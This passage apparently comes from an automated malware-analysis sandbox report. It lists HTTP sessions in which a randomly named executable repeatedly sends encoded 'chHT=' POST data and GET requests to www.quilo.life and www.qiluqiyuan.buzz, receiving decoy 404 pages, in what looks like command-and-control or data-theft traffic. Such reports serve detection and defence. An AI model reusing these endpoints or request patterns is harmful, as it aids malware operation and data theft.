                      Referer: http://www.quilo.life/ftr3/
                      Content-Type: application/x-www-form-urlencoded
                      Connection: close
                      Content-Length: 10301
                      Cache-Control: max-age=0
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                      Data Raw: 63 68 48 54 3d 32 69 4a 7a 63 6a 4c 65 45 64 76 75 45 50 30 73 58 50 38 47 6d 45 63 2b 76 79 78 75 68 57 4d 54 74 50 4a 36 44 6f 62 4e 35 69 71 30 6c 31 33 66 2b 69 4d 41 4a 32 51 63 62 69 53 73 63 45 53 59 69 6e 46 51 6f 62 31 59 65 50 43 6c 4c 32 31 56 2b 66 43 71 30 4f 42 5a 4e 36 4b 65 31 4d 6b 6d 31 6f 6e 2f 47 76 6c 39 61 4f 4f 76 72 41 46 54 6a 4e 2f 38 52 5a 76 74 39 47 31 31 6b 30 53 32 4c 6c 46 64 41 45 66 6b 6d 63 35 6a 79 33 57 68 5a 37 49 4d 49 71 34 77 4c 6a 66 42 31 4d 36 4a 33 50 43 5a 4d 31 49 4a 59 34 74 61 37 61 53 45 6b 6c 6a 48 6d 78 73 7a 75 65 39 55 57 37 53 43 61 6d 44 33 46 56 46 45 52 75 53 67 55 58 42 42 31 48 70 66 43 45 37 4d 70 35 72 50 77 39 44 4a 70 5a 2b 4a 71 51 76 58 5a 4b 63 7a 70 79 64 6f 76 41 52 76 79 50 50 52 57 6c 42 59 66 39 51 48 7a 6c 2b 46 6b 51 34 2f 54 7a 61 48 4e 79 59 51 43 6c 4d 59 72 70 59 70 4e 71 63 71 6d 63 67 45 54 39 33 68 39 62 79 6a 56 4b 39 69 77 6a 64 49 68 36 76 2b 49 55 45 42 70 48 62 6d 70 39 65 66 46 4d 34 70 5a 51 4d 51 58 63 78 6a 68 [TRUNCATED]
                      Data Ascii: chHT=2iJzcjLeEdvuEP0sXP8GmEc+vyxuhWMTtPJ6DobN5iq0l13f+iMAJ2QcbiSscESYinFQob1YePClL21V+fCq0OBZN6Ke1Mkm1on/Gvl9aOOvrAFTjN/8RZvt9G11k0S2LlFdAEfkmc5jy3WhZ7IMIq4wLjfB1M6J3PCZM1IJY4ta7aSEkljHmxszue9UW7SCamD3FVFERuSgUXBB1HpfCE7Mp5rPw9DJpZ+JqQvXZKczpydovARvyPPRWlBYf9QHzl+FkQ4/TzaHNyYQClMYrpYpNqcqmcgET93h9byjVK9iwjdIh6v+IUEBpHbmp9efFM4pZQMQXcxjhHlQvoEuFL9434eMQ+FI5zROIlEdVt8f8HyYXaivoU4lSCRSzx15/8RCSWWv9lySFZvHzASb5YR3zWwwfw4Nak9C8xIIQxZPf40n9aSC2lFgm9xyjw2VOFVCZAELSOLOcfTnyUQbLVOXhaHgHb3r/vJSrIT1iVaUrqEe+RnWYbz2Xs3mtU/pxUzIT1a0lGq9j3cG5sGj1mYA8vvdozFxQsyxsIMImliM8dsiQ6s5lA0PPEwKgtQ2D//b+c4n47xeHrF0FwbXlAz6WsqkUbuRrp8lmdoZTthEctLuHJZNUF3A6cZIDEJIQUtJA4cqvtkMzwTskYUkODU8R1VYg1IXPOFtb9CVLORkBfNG8WIzex9xqM1PhqgUQ66guejQgq3ey8w+Fl9ONuKqEI+aTOjeEX0j0eDt4m0h8faLBil0dByZLO+cRN07GkI3NGheDdAsbOzFNM4hlEb/U9cZmFdFPbygW74Td/K1WF3cSiv1I2UAiyVR1iy0qsYwl20goudRnz2y6BOoRMgjMqfxyymkNUolcH/Xeh3UM4ihNn0bDPgzdriXTzPD1osFLV4fv3vZjnZYWKAp9vJDunNk8QII4dflGEgtItSStIJP9l+KVV/N8uybayWFEJWzKmitv/9HI0cUm7ARlTRpNtUhWELPKQfvLKjYUo0otJm [TRUNCATED]
                      Sep 10, 2024 08:49:37.875740051 CEST658INHTTP/1.1 404 Not Found
                      Date: Tue, 10 Sep 2024 06:49:37 GMT
                      Server: Apache
                      Content-Length: 514
                      Connection: close
                      Content-Type: text/html
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e [TRUNCATED]
                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      20192.168.2.449757203.161.43.228801880C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe
                      TimestampBytes transferredDirectionData
                      Sep 10, 2024 08:49:39.748734951 CEST457OUTGET /ftr3/?chHT=7ghTfXuNFdv7bt0cfac8sWAvvgA+iGAttJoldp68xQSgk3fAwjETInI5bmz0SHizsmBfpbcRVbCgLhFU68m+mp46J/Wf0OAVor6kOMcVXs+ErAF0mdrKXqQ=&bd=rj1X_pBPLTnXd0 HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en
                      Host: www.quilo.life
                      Connection: close
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                      Sep 10, 2024 08:49:40.352597952 CEST673INHTTP/1.1 404 Not Found
                      Date: Tue, 10 Sep 2024 06:49:40 GMT
                      Server: Apache
                      Content-Length: 514
                      Connection: close
                      Content-Type: text/html; charset=utf-8
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e [TRUNCATED]
                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      21192.168.2.449758161.97.168.245801880C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe
                      TimestampBytes transferredDirectionData
                      Sep 10, 2024 08:49:45.433249950 CEST731OUTPOST /wjff/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en
                      Host: www.qiluqiyuan.buzz
                      Origin: http://www.qiluqiyuan.buzz
                      Referer: http://www.qiluqiyuan.buzz/wjff/
                      Content-Type: application/x-www-form-urlencoded
                      Connection: close
                      Content-Length: 201
                      Cache-Control: max-age=0
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                      Data Raw: 63 68 48 54 3d 31 49 39 71 4e 58 37 56 4c 47 44 72 52 4d 43 66 79 5a 38 61 44 63 48 4b 35 4e 4e 2b 46 37 65 32 6b 70 4f 6d 34 4c 42 49 66 42 78 4e 47 33 4f 30 43 65 7a 74 35 52 47 38 6d 50 4e 71 44 54 62 46 41 78 70 59 6c 79 2f 4d 67 45 43 59 43 51 6e 39 75 35 74 50 46 65 59 45 4f 4b 74 2f 47 2b 77 56 30 33 43 30 78 51 57 66 50 44 74 31 77 2f 7a 70 33 39 2b 35 61 74 31 6a 30 49 42 52 45 34 36 49 6a 38 54 34 6e 74 7a 6f 41 53 7a 6a 42 54 37 79 77 68 62 47 44 50 77 6f 47 4a 38 57 48 49 77 38 59 43 30 43 45 7a 65 4d 74 56 69 74 68 43 78 51 77 41 57 72 55 56 4d 4c 2b 47 34 58 59 59 42 71 72 51 3d 3d
                      Data Ascii: chHT=1I9qNX7VLGDrRMCfyZ8aDcHK5NN+F7e2kpOm4LBIfBxNG3O0Cezt5RG8mPNqDTbFAxpYly/MgECYCQn9u5tPFeYEOKt/G+wV03C0xQWfPDt1w/zp39+5at1j0IBRE46Ij8T4ntzoASzjBT7ywhbGDPwoGJ8WHIw8YC0CEzeMtVithCxQwAWrUVML+G4XYYBqrQ==
                      Sep 10, 2024 08:49:46.076337099 CEST1236INHTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Tue, 10 Sep 2024 06:49:45 GMT
                      Content-Type: text/html; charset=utf-8
                      Transfer-Encoding: chunked
                      Connection: close
                      Vary: Accept-Encoding
                      ETag: W/"66cd104a-b96"
                      Content-Encoding: gzip
                      Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                      Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                      Sep 10, 2024 08:49:46.076385975 CEST370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                      Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      22192.168.2.449759161.97.168.245801880C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe
                      TimestampBytes transferredDirectionData
                      Sep 10, 2024 08:49:47.975758076 CEST751OUTPOST /wjff/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en
                      Host: www.qiluqiyuan.buzz
                      Origin: http://www.qiluqiyuan.buzz
                      Referer: http://www.qiluqiyuan.buzz/wjff/
                      Content-Type: application/x-www-form-urlencoded
                      Connection: close
                      Content-Length: 221
                      Cache-Control: max-age=0
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                      Data Raw: 63 68 48 54 3d 31 49 39 71 4e 58 37 56 4c 47 44 72 51 74 79 66 2f 61 45 61 4c 63 48 4e 38 4e 4e 2b 53 72 65 79 6b 6f 79 6d 34 4c 6f 4e 63 7a 6c 4e 47 56 6d 30 44 63 4c 74 30 78 47 38 74 76 4e 56 4f 7a 62 61 41 78 73 37 6c 77 62 4d 67 46 6d 59 43 53 76 39 75 75 5a 41 45 4f 59 43 47 71 74 39 49 65 77 56 30 33 43 30 78 51 53 78 50 44 6c 31 7a 4f 44 70 77 70 69 34 57 4e 31 67 7a 49 42 52 58 6f 36 4d 6a 38 54 4f 6e 73 2f 4f 41 58 76 6a 42 54 4c 79 77 77 62 48 4a 50 77 78 43 4a 39 58 58 39 56 74 66 6d 74 71 43 77 6e 6a 76 55 6d 69 74 6b 67 4b 68 78 33 38 47 56 6f 34 6a 42 78 6a 56 62 38 6a 77 61 50 5a 37 4c 51 4d 4e 41 6a 30 46 34 6e 6f 37 6c 65 57 64 62 59 3d
                      Data Ascii: chHT=1I9qNX7VLGDrQtyf/aEaLcHN8NN+Sreykoym4LoNczlNGVm0DcLt0xG8tvNVOzbaAxs7lwbMgFmYCSv9uuZAEOYCGqt9IewV03C0xQSxPDl1zODpwpi4WN1gzIBRXo6Mj8TOns/OAXvjBTLywwbHJPwxCJ9XX9VtfmtqCwnjvUmitkgKhx38GVo4jBxjVb8jwaPZ7LQMNAj0F4no7leWdbY=
                      Sep 10, 2024 08:49:48.605144978 CEST1236INHTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Tue, 10 Sep 2024 06:49:48 GMT
                      Content-Type: text/html; charset=utf-8
                      Transfer-Encoding: chunked
                      Connection: close
                      Vary: Accept-Encoding
                      ETag: W/"66cd104a-b96"
                      Content-Encoding: gzip
                      Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                      Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                      Sep 10, 2024 08:49:48.605168104 CEST370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                      Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      23192.168.2.449760161.97.168.245801880C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe
                      TimestampBytes transferredDirectionData
                      Sep 10, 2024 08:49:50.523171902 CEST10833OUTPOST /wjff/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en
                      Host: www.qiluqiyuan.buzz
                      Origin: http://www.qiluqiyuan.buzz
                      Referer: http://www.qiluqiyuan.buzz/wjff/
                      Content-Type: application/x-www-form-urlencoded
                      Connection: close
                      Content-Length: 10301
                      Cache-Control: max-age=0
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                      Data Raw: 63 68 48 54 3d 31 49 39 71 4e 58 37 56 4c 47 44 72 51 74 79 66 2f 61 45 61 4c 63 48 4e 38 4e 4e 2b 53 72 65 79 6b 6f 79 6d 34 4c 6f 4e 63 7a 64 4e 47 6d 65 30 43 37 66 74 31 78 47 38 75 76 4e 75 4f 7a 62 58 41 31 42 79 6c 77 57 78 67 48 75 59 44 78 33 39 2b 4d 78 41 4f 4f 59 43 45 71 74 34 47 2b 78 58 30 7a 65 77 78 51 43 78 50 44 6c 31 7a 4d 62 70 6a 64 2b 34 51 4e 31 6a 30 49 42 64 45 34 37 62 6a 39 36 37 6e 73 37 34 41 6b 33 6a 42 7a 62 79 7a 47 33 48 55 2f 77 6b 46 4a 38 45 58 39 51 31 66 6e 46 49 43 78 53 2b 76 55 53 69 39 56 4a 52 6b 78 72 56 45 6a 41 61 79 77 4e 6b 61 35 74 6e 38 72 37 78 2f 61 4d 4e 4f 6a 4c 30 4c 66 79 32 6e 48 71 78 41 75 35 30 75 76 70 4a 30 75 51 4d 39 65 55 35 46 35 55 4c 58 6c 73 38 6b 71 78 6a 63 47 49 66 38 74 42 74 66 42 6e 47 31 65 70 4b 5a 6d 6c 50 61 35 65 65 4f 43 55 74 76 5a 37 35 7a 64 48 66 31 68 73 62 75 6d 61 35 41 57 73 47 42 62 56 34 41 41 35 76 48 75 43 33 55 69 37 39 77 4f 73 42 6b 45 59 6c 6a 72 33 57 34 64 65 49 78 59 2f 73 62 4d 65 42 76 78 58 59 36 [TRUNCATED]
                      Data Ascii: chHT=1I9qNX7VLGDrQtyf/aEaLcHN8NN+Sreykoym4LoNczdNGme0C7ft1xG8uvNuOzbXA1BylwWxgHuYDx39+MxAOOYCEqt4G+xX0zewxQCxPDl1zMbpjd+4QN1j0IBdE47bj967ns74Ak3jBzbyzG3HU/wkFJ8EX9Q1fnFICxS+vUSi9VJRkxrVEjAaywNka5tn8r7x/aMNOjL0Lfy2nHqxAu50uvpJ0uQM9eU5F5ULXls8kqxjcGIf8tBtfBnG1epKZmlPa5eeOCUtvZ75zdHf1hsbuma5AWsGBbV4AA5vHuC3Ui79wOsBkEYljr3W4deIxY/sbMeBvxXY6UxyGSKM3H26jDcDEeGyySK1zRUDG9kKiW8nrkBhq5e087U8wttKQj1Bke3GunnBco3C4yyAG9TIMdLT12t/V5Ov04WAQ1ivCH+m7Qp0sYWs3jk4aHqt9IV6w0HtkGwRfIOKB1rBjUb9I4RhILJ+GgS3GIbt4m7T8ep7RqHUxnHK9QWyVOlFXBmxoFcQuuydMleDgUuDrV0ONpDXRhBrmZgqgPwGmzwbE7Uqs2PmPkHfSie9KTZKv1bC2m1uhqJt7XMxjSX92gBY0KLwIs+QjUX6xVYz21qyGrySDhTJdzxTVNiNt58TLRqTyQuQ1Gge1EiH5iy5Iz/CQ97y3DVTvzqFNnsgLDhOHxrlpnK0IFPpLj/GipCLIq0ZEQ/4Z3/o+PLcV1JdgbTLznsh0KEtXbBMYTxCBY93TJfyLPuJJKwq9dCP4ISnMT0FMCT+xY2dkGYg27EVwUon2KzAnnhaTVu8dZ2E8mu2EDvLzGjU4T6K7vaWzKyAA8sHoBY0w6pV76KR7RmoExv0TwPbqmyrER0EbBSU7CDtcnO6dJcQvl1THF7MBXBAtzclU8b6yhJfda5SL8v3cAbwoygCWGbeVN261CM5EcvT8vZHKjWetLuI2WWMOLTVl0h94sKfC14+LVfAEMdLfp16yueIMmrbK2V1woBThorPQQ9 [TRUNCATED]
                      Sep 10, 2024 08:49:51.118318081 CEST1236INHTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Tue, 10 Sep 2024 06:49:51 GMT
                      Content-Type: text/html; charset=utf-8
                      Transfer-Encoding: chunked
                      Connection: close
                      Vary: Accept-Encoding
                      ETag: W/"66cd104a-b96"
                      Content-Encoding: gzip
                      Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                      Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                      Sep 10, 2024 08:49:51.118365049 CEST370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                      Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      24192.168.2.449761161.97.168.245801880C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe
                      TimestampBytes transferredDirectionData
                      Sep 10, 2024 08:49:53.101221085 CEST462OUTGET /wjff/?chHT=4KVKOjLTUXvpTd2tw7YgFu7M88ozG6iAiZnao6g9chZjOHWeMu7z3zqylslmOgP9LXsxnQP9kQW6V1nPysVCYIQBHe5WIuBUoW+30QfUJAtM0OLXkJ34ecY=&bd=rj1X_pBPLTnXd0 HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en
                      Host: www.qiluqiyuan.buzz
                      Connection: close
